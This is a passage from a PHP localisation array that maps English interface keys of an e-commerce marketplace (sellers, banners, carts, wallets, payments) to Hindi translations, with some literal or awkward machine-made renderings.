=> 'A to z ऑर्डर', 'a_z' => 'एक जेड', 'about_Company' => 'कम्पनी के बारे में', 'about_Our_Company' => 'हमारी कंपनी के बारे में', 'about_company' => 'कम्पनी के बारे में', 'about_us' => 'हमारे बारे में', 'ac_number' => 'एसी संख्या', 'accept_All_Cookies' => 'सभी कुकीज़ स्वीकार करें', 'access_denied' => 'पहुंच अस्वीकृत', 'access_denied!!' => 'पहुंच अस्वीकृत!!', 'access_token' => 'एक्सेस टोकन', 'according_to_theme' => 'थीम के अनुसार', 'account&shipping_info' => 'खाता और शिपिंग जानकारी', 'account_&_shipping_info' => 'खाता और शिपिंग जानकारी', 'account_Information' => 'खाता संबंधी जानकारी', 'account_Number' => 'खाता संख्या', 'account_email_not_verified' => 'खाता ईमेल सत्यापित नहीं है', 'account_has_been_deleted_you_can_not_change_the_status' => 'खाता हटा दिया गया है आप स्थिति नहीं बदल सकते हैं', 'account_holder_name' => 'खाता धारक का नाम', 'account_information' => 'खाता संबंधी जानकारी', 'account_name' => 'खाता नाम', 'account_no' => 'खाता नंबर', 'account_number' => 'खाता संख्या', 'account_phone_not_verified' => 'खाता फोन सत्यापित नहीं है', 'accounts' => 'हिसाब किताब', 'action' => 'कार्रवाई', 'action_disabled' => 'कार्रवाई अक्षम', 'activate' => 'सक्रिय', 'activate_maintenance_mode' => 'रखरखाव मोड सक्रिय करें', 'activated_successfully' => 'सफलतापूर्वक सक्रिय', 'activation failed' => 'सक्रियकरण असफल', 'activation_keys' => 'सक्रियण कुंजियाँ', 'active' => 'सक्रिय', 'active_Products' => 'सक्रिय उत्पाद', 'active_Status' => 'सक्रिय स्थिति', 'active_products' => 'सक्रिय उत्पाद', 'active_sellers' => 'सक्रिय विक्रेता', 'active_status' => 'सक्रिय स्थिति', 'add' => 'जोड़ना', 'add funds to wallet' => 'बटुए में धन जोड़ें', 'add_Address' => 'पता जोड़ें', 'add_Delivery_Man' => 'डिलीवरी मैन जोड़ें', 'add_Domain_(For_ex=>_demo.6amtech.com)' => 'डोमेन जोड़ें (पूर्व के लिए=> demo.6amtech.com)', 'add_Fields' => 'फ़ील्ड जोड़ें', 'add_Fund' => 'फंड जोड़ें', 'add_Fund_to_Wallet' => 'बटुए में फंड जोड़ें', 'add_Meta_Image_in' => 'में मेटा छवि जोड़ें', 'add_New' => 'नया जोड़ो', 'add_New_Method' => 'नई विधि जोड़ें', 'add_New_Product' => 'नया उत्पाद जोड़ें', 'add_New_Seller' => 'नया विक्रेता जोड़ें', 'add_Offline_Payment_Method' => 'ऑफ़लाइन भुगतान विधि जोड़ें', 'add_Product' => 'उत्पाद जोड़ें', 'add_Refund_Amount_to_Wallet' => 'बटुए में धनवापसी राशि जोड़ें', 'add_Shipping' => 'शिपिंग जोड़ें', 'add_a_abel_(Ex=>_abc_company)' => 'एक हाबिल जोड़ें (Ex=> ABC कंपनी)', 'add_a_label_(Ex=>_abc_company)' => 'एक लेबल जोड़ें (Ex=> ABC कंपनी)', 'add_address' => 'पता जोड़ें', 'add_banner' => 'बैनर जोड़ें', 'add_color-wise_product_images_here' => 'यहां रंग-वार उत्पाद चित्र जोड़ें', 'add_fund' => 'फंड जोड़ें', 'add_fund_by_admin' => 'व्यवस्थापक द्वारा फंड जोड़ें', 'add_fund_by_customer' => 'ग्राहक द्वारा फंड जोड़ें', 'add_fund_by_from_secured_digital_payment_gateways' => 'सुरक्षित डिजिटल भुगतान गेटवे से फंड जोड़ें', 'add_fund_to_wallet' => 'बटुए में फंड जोड़ें', 'add_fund_to_wallet_success' => 'बटुए सफलता के लिए फंड जोड़ें', 'add_main_banner' => 'मुख्य बैनर जोड़ें', 'add_method' => 'विधि जोड़ें', 'add_more_for_free_delivery' => 'मुफ्त डिलीवरी के लिए और जोड़ें', 'add_new' => 'नया जोड़ो', 'add_new_address' => 'नया पता जोड़ें', 'add_new_attribute' => 'नई विशेषता जोड़ें', 'add_new_customer' => 'नया ग्राहक जोड़ें', 'add_new_delivery_man' => 'नया डिलीवरी मैन जोड़ें', 'add_new_deliveryman' => 'नया डिलीवरी जोड़ें', 'add_new_language' => 'नई भाषा जोड़ें', 'add_new_notification' => 'नई अधिसूचना जोड़ें', 'add_new_order_wise_shipping' => 'नया ऑर्डर वार शिपिंग जोड़ें', 'add_new_product' => 'नया उत्पाद जोड़ें', 'add_new_seller' => 'नया विक्रेता जोड़ें', 'add_new_ticket' => 'नया टिकट जोड़ें', 'add_order_wise_shipping' => 'ऑर्डर वार शिपिंग जोड़ें', 'add_popup_banner' => 'पॉपअप बैनर जोड़ें', 'add_secondary_banner' => 'द्वितीयक बैनर जोड़ें', 'add_the_Stock_Quantity_of_this_product_that_will_be_visible_to_customers' => 'इस उत्पाद की स्टॉक मात्रा जोड़ें जो ग्राहकों को दिखाई देगा', 'add_the_YouTube_video_link_here._Only_the_YouTube-embedded_link_is_supported' => 'YouTube वीडियो लिंक यहां जोड़ें। केवल YouTube- एम्बेडेड लिंक समर्थित है', 'add_the_discount_amount_in_percentage_or_a_fixed_value_here' => 'प्रतिशत या एक निश्चित मूल्य में छूट राशि जोड़ें', 'add_the_product_search_tag_for_this_product_that_customers_can_use_to_search_quickly' => 'इस उत्पाद के लिए उत्पाद खोज टैग जोड़ें जिसे ग्राहक जल्दी से खोजने के लिए उपयोग कर सकते हैं', 'add_the_purchase_price_for_this_product' => 'इस उत्पाद के लिए खरीद मूल्य जोड़ें', 'add_to_Cart' => 'कार्ट में जोड़ें', 'add_to_cart' => 'कार्ट में जोड़ें', 'add_to_compare' => 'तुलना में जोड़ें', 'add_to_wishlist' => 'इच्छा सूची में जोड़ें', 'add_valid_data' => 'मान्य डेटा जोड़ें', 'add_your_productâs_thumbnail_in' => 'अपने उत्पाद के थंबनेल में जोड़ें', 'added_to_cart_successfully!' => 'सफलतापूर्वक कार्ट में जोड़ा गया!', 'added_via_payment_method' => 'भुगतान विधि के माध्यम से जोड़ा गया', 'additional' => 'अतिरिक्त', 'additional_information' => 'अतिरिक्त जानकारी', 'addon' => 'ऐड ऑन', 'addon_menus' => 'ऐडॉन मेनू', 'address' => 'पता', 'address_added_successfully!' => 'पता सफलतापूर्वक जोड़ा गया!', 'address_not_found' => 'पता नहीं पाया गया', 'address_type' => 'पता मुद्रलेख', 'addresses' => 'पतों', 'admin' => 'व्यवस्थापक', 'admin wallet histori...' => 'व्यवस्थापक वॉलेट इतिहास ...', 'admin wallets' => 'व्यवस्थापक बटुए', 'admin@admin.com' => 'Admin@admin.com', 'admin_Commission' => 'व्यवस्थापक आयोग', 'admin_Discount' => 'व्यवस्थापक छूट', 'admin_Earning' => 'व्यवस्थापक कमाई', 'admin_Earning_Report' => 'व्यवस्थापक अर्जित रिपोर्ट', 'admin_Login_Page' => 'व्यवस्थापक लॉगिन पृष्ठ', 'admin_Net_Income' => 'शुद्ध आय', 'admin_also_rewards_their_top_customers_with_wallet_money' => 'व्यवस्थापक अपने शीर्ष ग्राहकों को बटुए के पैसे के साथ भी पुरस्कृत करें', 'admin_approval_for_products' => 'उत्पादों के लिए व्यवस्थापक अनुमोदन', 'admin_approval_for_products_updated_successfully!' => 'सफलतापूर्वक अपडेट किए गए उत्पादों के लिए व्यवस्थापक अनुमोदन!', 'admin_bearer' => 'व्यवस्थापक वाहक', 'admin_can_review_the_registration_request_and_approve_or_deny_the_request' => 'व्यवस्थापक पंजीकरण अनुरोध की समीक्षा कर सकते हैं और अनुरोध को मंजूरी या अस्वीकार कर सकते हैं', 'admin_can_set_whether_customers_can_add_money_to_their_wallets_by_enabling_or_disabling_this_button' => 'व्यवस्थापक सेट कर सकते हैं कि क्या ग्राहक इस बटन को सक्षम या अक्षम करके अपने वॉलेट में पैसे जोड़ सकते हैं', 'admin_can_set_whether_customers_will_get_loyalty_points_by_enabling_or_disabling_this_button' => 'व्यवस्थापक सेट कर सकते हैं कि क्या ग्राहकों को इस बटन को सक्षम या अक्षम करके वफादारी अंक मिलेंगे या नहीं', 'admin_can_set_whether_customers_will_get_referral_earnings_by_enabling_or_disabling_this_button' => 'व्यवस्थापक सेट कर सकते हैं कि क्या ग्राहकों को इस बटन को सक्षम या अक्षम करके रेफरल आय मिलेगी', 'admin_can_set_whether_customers_will_get_refund_amount_to_wallet_by_enabling_or_disabling_this_button' => 'व्यवस्थापक सेट कर सकते हैं कि क्या ग्राहकों को इस बटन को सक्षम या अक्षम करके बटुए के लिए धनवापसी राशि मिलेगी', 'admin_can_set_whether_deliveryman_needs_to_upload_the_picture_of_delivery_by_enabling_or_disabling_this_button' => 'व्यवस्थापक सेट कर सकते हैं कि क्या डिलीवरीमैन को इस बटन को सक्षम या अक्षम करके डिलीवरी की तस्वीर अपलोड करने की आवश्यकता है', 'admin_can_set_whether_wallet_will_be_available_on_customer_profile_by_enabling_or_disabling_this_button' => 'व्यवस्थापक सेट कर सकते हैं कि क्या वॉलेट इस बटन को सक्षम या अक्षम करके ग्राहक प्रोफ़ाइल पर उपलब्ध होगा', 'admin_commission' => 'व्यवस्थापक आयोग', 'admin_discount' => 'व्यवस्थापक छूट', 'admin_login_url' => 'व्यवस्थापक लॉगिन url', 'admin_net_income' => 'शुद्ध आय', 'admin_or_Employee_Login' => 'व्यवस्थापक या कर्मचारी लॉगिन', 'admin_wallet' => 'व्यवस्थापक बटुआ', 'admin_will_handle_the_shipping_responsibilities_when_you_choose_inhouse_shipping_method' => 'जब आप इनहाउस शिपिंग विधि चुनते हैं तो व्यवस्थापक शिपिंग जिम्मेदारियों को संभालेंगे', 'after_changing_any_theme_in_the_you_will_a_menu_option_with_the_menu_name.' => 'आप मेनू नाम के साथ एक मेनू विकल्प में किसी भी विषय को बदलने के बाद।', 'after_switching_the_theme_a_menu_will_appear_in_the_side_bar_with_the_theme_name_on_it' => 'थीम को स्विच करने के बाद एक मेनू उस पर थीम नाम के साथ साइड बार में दिखाई देगा', 'after_the_order_is_delivered_total_order_amount_will_be_shown_here' => 'ऑर्डर दिए जाने के बाद कुल ऑर्डर राशि यहां दिखाई जाएगी', 'after_uploading_products_you_need_to_edit_them_and_set_product_images_and_choices.' => 'उत्पादों को अपलोड करने के बाद आपको उन्हें संपादित करने और उत्पाद छवियों और विकल्पों को सेट करने की आवश्यकता होती है।', 'again_click_plus_icon' => 'फिर से प्लस आइकन पर क्लिक करें', 'agent_number' => 'अभिकरण संख्या', 'alex' => 'एलेक्स', 'all' => 'सभी', 'all_Categories' => 'सब वर्ग', 'all_Category' => 'सभी श्रेणी', 'all_Pages_Banner' => 'सभी पृष्ठ बैनर', 'all_Pages_Banner ' => 'सभी पृष्ठ बैनर', 'all_Priority' => 'सभी प्राथमिकता', 'all_Products' => 'सभी प्रोडक्ट', 'all_Sellers' => 'सभी विक्रेता', 'all_Status' => 'सभी स्थिति', 'all_Transaction' => 'सभी लेन -देन', 'all_Transactions' => 'सभी लेन - देन', 'all_brand' => 'सभी ब्रांडों', 'all_brands' => 'सभी ब्रांडों', 'all_brands_page' => 'सभी ब्रांड पेज', 'all_cart_product_list' => 'सभी कार्ट उत्पाद सूची', 'all_categories' => 'सब वर्ग', 'all_category' => 'सब वर्ग', 'all_copy_right_reserved_©_2023_' => 'सभी कॉपी राइट आरक्षित  © 2023', 'all_customer' => 'सभी ग्राहक', 'all_customers' => 'सभी ग्राहक', 'all_items_were_not_added_to_cart_as_they_are_currently_unavailable_for_purchase!' => 'सभी वस्तुओं को कार्ट में नहीं जोड़ा गया था क्योंकि वे वर्तमान में खरीद के लिए अनुपलब्ध हैं!', 'all_product' => 'सभी उत्पाद', 'all_products' => 'सभी प्रोडक्ट', 'all_seller' => 'सभी विक्रेता', 'all_sellers' => 'सभी विक्रेता', 'all_shop' => 'सभी दुकान', 'all_status' => 'सभी स्थिति', 'all_store' => 'सभी भंडार', 'all_stores' => 'सभी भंडार', 'all_sub_categories' => 'सभी उप श्रेणियां', 'all_sub_sub_categories' => 'सभी उप उप श्रेणियां', 'all_the_promotional_banners_from_the_website_and_user_app_will_be_clear_once_the_theme_is_changed.' => 'वेबसाइट और उपयोगकर्ता ऐप के सभी प्रचार बैनर थीम को बदलने के बाद स्पष्ट हो जाएंगे।', 'all_wishing_product_list' => 'सभी इच्छा उत्पाद सूची', 'all_your_apps_and_customer_website_will_be_disabled_until_you_turn_this_mode_OFF' => 'जब तक आप इस मोड को बंद नहीं करेंगे, तब तक आपके सभी ऐप और ग्राहक वेबसाइट अक्षम हो जाएंगी', 'all_your_data_are_safe' => 'आपके सभी डेटा सुरक्षित हैं', 'already_Settled' => 'पहले से ही व्यवस्थित', 'already_Withdrawn' => 'पहले से ही वापस ले लिया गया', 'already_added!' => 'पहले से ही जोड़ा!', 'already_check' => 'पहले से ही जाँच करें', 'already_have_an_account _login.' => 'क्या आपके पास पहले से एक खाता मौजूद है? लॉगिन करें।', 'already_have_store ' => 'पहले से ही स्टोर है', 'amount' => 'मात्रा', 'amount_can_not_be_negative_or_zero' => 'राशि नकारात्मक या शून्य नहीं हो सकती है', 'amount_can_not_be_negative_or_zero!' => 'राशि नकारात्मक या शून्य नहीं हो सकती है!', 'amount_to_be_paid' => 'जितनी राशि अदा की जानी है', 'an_OTP' => 'एक ओटीपी', 'analytics' => 'एनालिटिक्स', 'analytics_script' => 'एनालिटिक्स स्क्रिप्ट', 'and' => 'और', 'and press' => 'और दबाएं', 'and_billing' => 'और बिलिंग', 'and_enjoy' => 'और आनंद करो', 'and_press' => 'और दबाएं', 'announcement' => 'घोषणा', 'announcement_setup' => 'घोषणा सेटअप', 'announcements' => 'घोषणाएं', 'another_address' => 'एक और पता', 'api_ID' => 'एपीआई आईडी', 'api_Key' => 'एपीआई कुंजी', 'api_key' => 'एपीआई कुंजी', 'api_secret' => 'एपीआई सीक्रेट', 'app_Download_Link' => 'ऐप डाउनलोड लिंक', 'app_Settings' => 'एप्लिकेशन सेटिंग', 'app_debug' => 'ऐप डिबग', 'app_download_info' => 'ऐप डाउनलोड जानकारी', 'app_mode' => 'ऐप मोड', 'app_name' => 'एप्लिकेशन का नाम', 'app_settings' => 'एप्लिकेशन सेटिंग', 'app_store_download_link' => 'ऐप स्टोर डाउनलोड लिंक', 'app_url' => 'अनुप्रयोग url', 'apple' => 'सेब', 'apple_developer_account_name' => 'Apple डेवलपर खाता नाम', 'apple_store' => 'सेब दुकान', 'apply' => 'आवेदन करना', 'apply_Shop' => 'शॉप लगाओ', 'apply_code' => 'कोड लागू करें', 'apply_coupon_code' => 'कूपन कोड लागू करें', 'approval_for_products' => 'उत्पादों के लिए अनुमोदन', 'approved' => 'अनुमत', 'approved_Products' => 'स्वीकृत उत्पाद', 'approved_note' => 'अनुमोदित नोट', 'are_you_sure' => 'क्या आपको यकीन है', 'are_you_sure ' => 'क्या आपको यकीन है', 'are_you_sure_Change_this' => 'क्या आपको यकीन है कि इसे बदलें', 'are_you_sure_change_this' => 'क्या आपको यकीन है कि इसे बदलें', 'are_you_sure_delete_this' => 'क्या आपको यकीन है कि इसे हटा दें', 'are_you_sure_delete_this_banner' => 'क्या आपको यकीन है कि इस बैनर को हटा दें', 'are_you_sure_delete_this_brand' => 'क्या आपको यकीन है कि इस ब्रांड को हटा दें', 'are_you_sure_delete_this_most_demanded_product' => 'क्या आप निश्चित रूप से इस सबसे अधिक मांग वाले उत्पाद को हटा दें', 'are_you_sure_delete_this_social_media' => 'क्या आप निश्चित हैं कि इस सोशल मीडिया को हटा दें', 'are_you_sure_remove_this_product' => 'क्या आप सुनिश्चित हैं कि इस उत्पाद को हटा दें', 'are_you_sure_to_delete_this' => 'क्या आप इसे हटाने के लिए सुनिश्चित हैं', 'are_you_sure_you_want_to_delete_the_addon' => 'क्या आप सुनिश्चित हैं कि आप Addon को हटाना चाहते हैं', 'are_you_sure_you_want_to_delete_the_theme' => 'क्या आप सुनिश्चित हैं कि आप थीम को हटाना चाहते हैं', 'aready_Withdrawn' => 'Aready वापस ले लिया', 'ask_about_this_product' => 'इस उत्पाद के बारे में पूछें', 'assign' => 'सौंपना', 'attachment' => 'लगाव', 'attribute' => 'गुण', 'attribute_Name' => 'उत्तरदायी ठहराने के लिए नाम', 'attribute_Setup' => 'विशेषता सेटअप', 'attribute_deleted_successfully' => 'विशेषता सफलतापूर्वक हटा दी गई', 'attribute_list' => 'विशेषता सूची', 'attributes' => 'गुण', 'audio' => 'ऑडियो', 'auth_domain' => 'प्रामाणिक डोमेन', 'auth_key' => 'प्रमाणन कुंजी', 'authentic_payment' => 'प्रामाणिक भुगतान', 'authkey' => 'प्रमाणन कुंजी', 'authorized_redirect_URIs' => 'अधिकृत पुनर्निर्देशित उरिस', 'auto_translate' => 'ऑटो अनुवाद', 'available' => 'उपलब्ध', 'available_from_minimum_purchase' => 'न्यूनतम खरीद से उपलब्ध', 'available_variations' => 'उपलब्ध विविधताएँ', 'average' => 'औसत', 'average_Earning_Value' => 'औसत अर्जित मूल्य', 'average_Product_Value' => 'औसत उत्पाद मूल्य', 'average_Ratings' => 'औसत रेटिंग', 'back' => 'पीछे', 'back_to_seller_list' => 'वापस विक्रेता सूची में', 'back_to_shipping' => 'शिपिंग के लिए वापस', 'background_color' => 'पृष्ठभूमि का रंग', 'balance' => 'संतुलन', 'bank' => 'किनारा', 'bank_Info_View' => 'बैंक जानकारी दृश्य', 'bank_Information' => 'बैंक संबंधी जानकारी', 'bank_Name' => 'बैंक का नाम', 'bank_info' => 'बैंक जानकारी', 'bank_information' => 'बैंक संबंधी जानकारी', 'bank_name' => 'बैंक का नाम', 'banned_seller' => 'प्रतिबंधित विक्रेता', 'banner' => 'बैनर', 'banner about us' => 'हमारे बारे में बैनर', 'banner cancellation policy' => 'बैनर रद्दीकरण नीति', 'banner faq page' => 'बैनर प्रश्न पृष्ठ', 'banner privacy policy' => 'बैनर गोपनीयता नीति', 'banner product list page' => 'Banner product list page', 'banner refund policy' => 'बैनर रिफंड पॉलिसी', 'banner return policy' => 'बैनर वापसी नीति', 'banner terms conditions' => 'बैनर शर्तों की शर्तें', 'banner_URL' => 'बैनर यूआरएल', 'banner_added_successfully' => 'बैनर ने सफलतापूर्वक जोड़ा', 'banner_deleted_successfully' => 'बैनर को सफलतापूर्वक हटा दिया गया', 'banner_form' => 'बैनर फार्म', 'banner_image' => 'बैनर छवि', 'banner_photo' => 'बैनर फोटो', 'banner_published_successfully' => 'बैनर को सफलतापूर्वक प्रकाशित किया गया', 'banner_table' => 'बैनर टेबल', 'banner_type' => 'बैनर प्रकार', 'banner_unpublished_successfully' => 'बैनर अप्रकाशित सफलतापूर्वक', 'banner_update_form' => 'बैनर अद्यतन प्रपत्र', 'banner_updated_successfully' => 'बैनर को सफलतापूर्वक अपडेट किया गया', 'banner_url' => 'बैनर यूआरएल', 'banners' => 'बैनर', 'barcode' => 'बारकोड', 'base_URL_of_the_site_ex=>' => 'साइट का आधार url पूर्व=>', 'base_url_by_region' => 'Base url by region', 'basic' => 'बुनियादी', 'basic_Information' => 'मूल जानकारी', 'be_careful_before_you_turn_on/off_maintenance_mode' => 'रखरखाव मोड को चालू/बंद करने से पहले सावधान रहें', 'be_the_first_one_to_know_about_discounts_offers_and_events' => 'छूट ऑफ़र और घटनाओं के बारे में जानने वाले पहले व्यक्ति बनें', 'bearer' => 'ले जानेवाला', 'become_a_seller' => 'विक्रेता बनें', 'before_delivered_you_need_to_make_payment_status_paid' => 'वितरित करने से पहले आपको भुगतान की स्थिति का भुगतान करने की आवश्यकता है', 'before_the_seller_confirms_the_order' => 'विक्रेता आदेश की पुष्टि करने से पहले', 'below_Average' => 'औसत से कम', 'best selling' => 'सर्वश्रेष्ठ बिक्री', 'best sellings' => 'सर्वश्रेष्ठ विक्रय', 'best-selling' => 'सर्वश्रेष्ठ बिक्री', 'best_selling' => 'सर्वश्रेष्ठ बिक्री', 'best_selling_product' => 'बेस्ट सेलिंग प्रोडक्ट्स', 'best_sellings' => 'सर्वश्रेष्ठ विक्रय', 'bestsellings' => 'BestSellings', 'billing' => 'बिलिंग', 'billing addresses' => 'बिलिंग पते', 'billing_Section' => 'बिलिंग अनुभाग', 'billing_address' => 'बिल भेजने का पता', 'billing_input_by_customer' => 'ग्राहक द्वारा बिलिंग इनपुट', 'billing_to' => 'बिलिंग के लिए', 'bkash' => 'बीकाश', 'block' => 'अवरोध पैदा करना', 'blog' => 'ब्लॉग', 'bonus' => 'बक्शीश', 'bonus_amount' => 'बोनस राशि', 'bonus_info' => 'बोनस जानकारी', 'bonus_removed_Successfully' => 'बोनस को सफलतापूर्वक हटा दिया गया', 'bonus_title' => 'बोनस शीर्षक', 'bonus_type' => 'बोनस प्रकार', 'both_Phone_&_Email_verification_can_not_be_active_at_a_time' => 'दोनों फोन और ईमेल सत्यापन एक समय में सक्रिय नहीं हो सकते हैं', 'bottom' => 'तल', 'branch' => 'शाखा', 'branch_Name' => 'शाखा का नाम', 'branch_name' => 'शाखा का नाम', 'brand' => 'ब्रांड', 'brand is required!' => 'ब्रांड की आवश्यकता है!', 'brand_Add' => 'ब्रांड ऐड', 'brand_List' => 'ब्रांड सूची', 'brand_Logo' => 'ब्रांड लोगो', 'brand_Name' => 'ब्रांड का नाम', 'brand_Setup' => 'ब्रांड सेटअप', 'brand_deleted_successfully' => 'ब्रांड सफलतापूर्वक हटा दिया गया', 'brand_list' => 'ब्रांड सूची', 'brand_logo' => 'ब्रांड लोगो', 'brands' => 'ब्रांड्स', 'bulk_Import' => 'थोक आयात', 'bulk_export' => 'थोक निर्यात', 'bulk_import' => 'थोक आयात', 'business' => 'व्यापार', 'business section' => 'व्यापार अनुभाग', 'business_Information' => 'व्यवसाय जानकारी', 'business_Setup' => 'व्यापारिक प्रकोष्ठ', 'business_analytics' => 'व्यापारिक विश्लेषणात्मक', 'business_model' => 'व्यापार मॉडल', 'business_section' => 'व्यापार अनुभाग', 'business_settings' => 'व्यापारिक सेटिंग्स', 'business_setup' => 'व्यापारिक प्रकोष्ठ', 'button_admin_can_pause_his_shop_activities_and_his_shop_will_be_shown_as' => 'बटन व्यवस्थापक उसकी दुकान की गतिविधियों को रोक सकता है और उसकी दुकान को दिखाया जाएगा', 'button_to_verify_the_SMTP_connection' => 'SMTP कनेक्शन को सत्यापित करने के लिए बटन', 'buy_now' => 'अभी खरीदें', 'buyer_username' => 'खरीदार उपयोगकर्ता नाम', 'by_Turning_OFF_Picture_Upload_on_Delivery' => 'डिलीवरी पर पिक्चर अपलोड को बंद करके', 'by_Turning_ON_Guest_Checkout_Mode' => 'अतिथि चेकआउट मोड को चालू करके', 'by_Turning_ON_Picture_Upload_on_Delivery' => 'डिलीवरी पर पिक्चर अपलोड को चालू करके', 'by_Turning_Off_Guest_Checkout_Mode' => 'अतिथि चेकआउट मोड को बंद करके', 'by_admin' => 'व्यवस्थापक द्वारा', 'by_clicking_sign_up_you_are_agreed_with_our' => 'साइन अप पर क्लिक करके आप हमारे साथ सहमत हैं', 'by_clicking_sign_up_you_are_agreed_with_our ' => 'साइन अप पर क्लिक करके आप हमारे साथ सहमत हैं', 'by_review_rating' => 'समीक्षा रेटिंग द्वारा', 'by_self_delivery_man' => 'सेल्फ डिलीवरी मैन द्वारा', 'by_seller' => 'विक्रेता द्वारा', 'by_third_party_delivery_service' => 'तृतीय पक्ष वितरण सेवा द्वारा', 'by_turning_on_the' => 'चालू करके', 'by_turning_the' => 'मोड़कर', 'call_us' => 'हमें बुलाओ', 'callback_URI' => 'कॉलबैक उरी', 'can_email_us_at' => 'हमें ईमेल कर सकते हैं', 'cancel' => 'रद्द करना', 'cancel_Order' => 'आदेश रद्द', 'cancel_order' => 'आदेश रद्द', 'canceled' => 'रद्द', 'canceled_Orders' => 'रद्द आदेश', 'cancellation policy' => 'रद्द करने की नीति', 'cancellation_policy' => 'रद्द करने की नीति', 'cancelled' => 'रद्द', 'cannot_Use_0_only' => 'केवल 0 का उपयोग नहीं कर सकते', 'captcha' => 'कॅप्चा', 'card' => 'कार्ड', 'card_holder_email' => 'कार्ड धारक ईमेल', 'card_holder_name' => 'कार्डधारक का नाम', 'card_number' => 'कार्ड संख्या', 'card_nummber' => 'कार्ड', 'card_type' => 'कार्ड का प्रकार', 'cart' => 'कार्ट', 'cart shippings' => 'कार्ट शिपिंग', 'cart_empty' => 'बेकार', 'cart_list' => 'कार्ट सूची', 'cart_updated' => 'अद्यतित गाड़ी', 'carts' => 'गाड़ियां', 'cash' => 'नकद', 'cash on delivery' => 'डिलवरी पर नकदी', 'cash_Payment' => 'नकद भुगतान', 'cash_Payments' => 'नकद भुगतान', 'cash_on_delivery' => 'डिलवरी पर नकदी', 'cash_payment' => 'नकद भुगतान', 'cash_payments' => 'नकद भुगतान', 'categories' => 'श्रेणियाँ', 'category' => 'वर्ग', 'category is required!' => 'श्रेणी की आवश्यकता है!', 'category shipping co...' => 'श्रेणी शिपिंग सह ...', 'category wise' => 'श्रेणी के अनुसार', 'category_Image' => 'श्रेणी की छवि', 'category_Logo' => 'श्रेणी का लोगो', 'category_Name' => 'श्रेणी नाम', 'category_Setup' => 'श्रेणी सेटअप', 'category_deleted_successfully.' => 'श्रेणी सफलतापूर्वक हटा दी गई।', 'category_form' => 'श्रेणी के रूप में', 'category_list' => 'श्रेणी सूची', 'category_name' => 'श्रेणी नाम', 'category_table' => 'श्रेणी तालिका', 'category_tag' => 'श्रेणी का टैग', 'category_wise' => 'श्रेणी के अनुसार', 'category_wise_shipping_cost' => 'श्रेणी के वार शिपिंग लागत', 'cccc' => 'सीसीसीसी', 'cgbfghnb' => 'CGBEBHB', 'change_by' => 'बदलना', 'change_order_status' => 'आदेश की स्थिति बदलें', 'change_refund_status' => 'धनवापसी स्थिति बदलें', 'change_status_to_paid' => 'भुगतान की स्थिति बदलें', 'change_your_password' => 'अपना पासवर्ड बदलें', 'change_your_password_in_three_easy_steps.' => 'तीन आसान चरणों में अपना पासवर्ड बदलें।', 'change_your_profile' => 'अपनी प्रोफ़ाइल बदलें', 'changed_by' => 'द्वारा बदल दिया', 'changes' => 'परिवर्तन', 'changing_some_settings_will_take_time_to_show_effect_please_clear_session_or_wait_for_60_minutes_else_browse_from_incognito_mode' => 'कुछ सेटिंग्स बदलने से प्रभाव दिखाने में समय लगेगा कृपया स्पष्ट सत्र या 60 मिनट तक प्रतीक्षा करें', 'chat' => 'बात करना', 'chat_with_delivery-man' => 'डिलीवरी-मैन के साथ चैट करें', 'chat_with_delivery_man' => 'डिलीवरी मैन के साथ चैट करें', 'chat_with_deliveryman' => 'डिलीवरीमैन के साथ चैट करें', 'chat_with_seller' => 'विक्रेता के साथ चैट करें', 'chatbox' => 'चैट बॉक्स', 'chatting_List' => 'चैटिंग सूची', 'chatting_Page' => 'चैटिंग पेज', 'chattings' => 'चैटिंग', 'check' => 'जाँच करना', 'check in' => 'चेक इन', 'check_All_CartList' => 'सभी कार्टलिस्ट की जाँच करें', 'check_All_Wishlist' => 'सभी विशलिस्ट की जाँच करें', 'check_Minimum_Order_Amount_Requirment' => 'न्यूनतम आदेश राशि आवश्यकता की जाँच करें', 'check_My_All_Orders' => 'मेरे सभी आदेशों की जाँच करें', 'check_Please' => 'कृपया जांच करें', 'check_all_order' => 'सभी आदेश की जाँच करें', 'check_in_âAccept_the_reCAPTCHA_Terms_of_Serviceâ' => ' में जाँच करें सेवा के recaptcha शर्तों को स्वीकार करें', 'check_now' => 'अब जांचें', 'check_orders' => 'आदेशों की जाँच करें', 'check_please' => 'कृपया जांच करें', 'check_your_email' => 'अपने ईमेल की जाँच करें', 'checkout' => 'चेक आउट', 'checkout_details' => 'चेकआउट विवरण', 'choice_Title' => 'विकल्प शीर्षक', 'choose' => 'चुनना', 'choose_File' => 'फाइलें चुनें', 'choose_Payment_Method' => 'भुगतान का तरीका चुनें', 'choose_billing_address' => 'बिलिंग पता चुनें', 'choose_customer' => 'ग्राहक चुनें', 'choose_delivery_man' => 'डिलीवरी मैन चुनें', 'choose_delivery_type' => 'वितरण प्रकार चुनें', 'choose_environment' => 'पर्यावरण चुनें', 'choose_file' => 'फाइलें चुनें', 'choose_payment' => 'भुगतान चुनें', 'choose_priority' => 'प्राथमिकता चुनें', 'choose_priority_number' => 'प्राथमिकता संख्या चुनें', 'choose_product' => 'उत्पाद चुनें', 'choose_shipping_address' => 'शिपिंग पता चुनें', 'choose_shipping_method' => 'शिपिंग विधि चुनें', 'choose_the_appropriate_encryption_method' => 'उपयुक्त एन्क्रिप्शन विधि चुनें', 'choose_updated_file' => 'अद्यतन फ़ाइल चुनें', 'city' => 'शहर', 'clean_database' => 'स्वच्छ डेटाबेस', 'clear' => 'स्पष्ट', 'clear_all' => 'सभी साफ करें', 'clear_cart' => 'कार्ट को खाली करें', 'click' => 'क्लिक', 'click_continue_and_download_the_file_in_device_named_AuthKey_ID.p8_(store_it_safely_and_it_is_used_for_push_notification)' => 'जारी रखें पर क्लिक करें।', 'click_here' => 'यहाँ क्लिक करें', 'click_on_continue' => 'जारी रखें पर क्लिक करें', 'click_on_the' => 'पर क्लिक करें', 'click_on_the_map_to_see_your_location_latitude' => 'अपना स्थान अक्षांश देखने के लिए मानचित्र पर क्लिक करें', 'click_on_the_map_to_see_your_location_longitude' => 'अपना स्थान देशांतर देखने के लिए मानचित्र पर क्लिक करें', 'click_plus_icon' => 'प्लस आइकन पर क्लिक करें', 'client' => 'ग्राहक', 'client_ID' => 'ग्राहक ID', 'client_OAuth_Login' => 'ग्राहक oauth लॉगिन', 'client_Secret' => 'ग्राहक गुप्त', 'client_id' => 'ग्राहक ID', 'client_secret' => 'ग्राहक गुप्त', 'close' => 'बंद करना', 'close_for_now' => 'अभी के लिए बंद करें', 'close_now' => 'अब बंद करो', 'closed_for_now' => 'अभी के लिए बंद', 'closed_now' => 'अब बंद हो गया', 'code' => 'कोड', 'codecanyon_username' => 